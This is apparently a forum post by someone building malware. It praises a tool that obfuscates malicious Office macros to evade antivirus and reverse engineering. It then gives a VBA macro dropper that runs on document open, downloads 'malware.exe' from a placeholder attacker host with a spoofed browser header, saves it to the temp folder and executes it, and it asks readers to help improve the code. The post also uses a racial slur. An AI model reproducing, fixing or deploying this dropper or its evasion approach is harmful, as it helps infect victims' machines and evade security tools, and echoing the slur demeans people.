A common vector for the delivery of malware is via Word/Excel macro. Obfuscating/encrypting the source code of your malware itself is obviously very important. Not only for opsec purposes but the longer it takes researchers/AV companies to reverse engineer your malware the longer it will stay effective. If your delivery mechanism is through a downloader embedded in an Office document adding obfuscation and encryption not only protects against reverse engineering but aids in evading AV heuristics as well. To that end i've found a python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. It's features are as follows;
- Encrypt all strings present in your VBA code
- Encrypt data from your python Script in VBA code (domain names or paths for example)
- Randomize each functions' (or variables) names
- Choose Encryption method, how and where encryption keys are stored
- Generate as many unique MS Office documents as you want using a file name list and a document template
- Enable autodestruction of encryption Keys feature once the VBA has been triggered once
As i understand it, the way it works is as follows. The python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation like randomizing a variable or function name, for instance:
Function [rdm::10]Test() '=> Test() will become randomized with a 10 characters string
[rdm::4]String_1 = "Test" '=> String_1 wil lbecome randomized with a 4 characters string
Depending on the values you set in config.py a type of encryption is selected among a number of other settings. Here's a screenshot of the script in action.
Pretty cool if you ask me, here's a link to the relevant repo on github.
https://github.com/Pepitoh/VBadNow doing some research into malware deployed in this manner and relevant code examples written in VB Script i kind of tried to nigger rig the following based on code found here.
https://github.com/CloudStrief/xcode...doc/skript.txt
Option Explicit
Public CN As String
Public APD As String
Public UN As String
Public HOSTNAME As String
Public DROPPER_EXE As String
Public PAYLOADS_FOLDER As String
Public PAYLOAD_FILE As String
Function InitMe()
DROPPER_EXE = "malware.exe"
HOSTNAME = "http://www.evilhost.com/code"
PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
CN = Environ("COMPUTERNAME")
APD = Environ("TMP")
UN = Environ("USERNAME")
End Function
Sub Document_Open()
InitMe
Dim val As String
Dim FN As String
PayLoad (APD + DROPPER_EXE)
Dim oShell
Set oShell = CreateObject("WScript.Shell")
oShell.Run APD + DROPPER_EXE
FN = APD
On Error GoTo 0
End Sub
Private Sub writeBytes(file, bytes)
Dim binaryStream
Set binaryStream = CreateObject("ADODB.Stream")
binaryStream.Type = 1
binaryStream.Open
binaryStream.Write bytes
binaryStream.SaveToFile file, 2
End Sub
Function getPayload(val As String, FN As String)
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE
WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
WinHttpReq.send
writeBytes FN, WinHttpReq.ResponseBody
End Function
This is probably full of errors since i don't have a clue about Visual Basic/VBA/VBS so i was wondering if you could help me improve this particular block of code. Interestingly enough the original repo contains all you need including malware itself written in python and everything you need server side to deploy this. If you're interested here's a link to the complete project.
https://github.com/CloudStrief/xcode
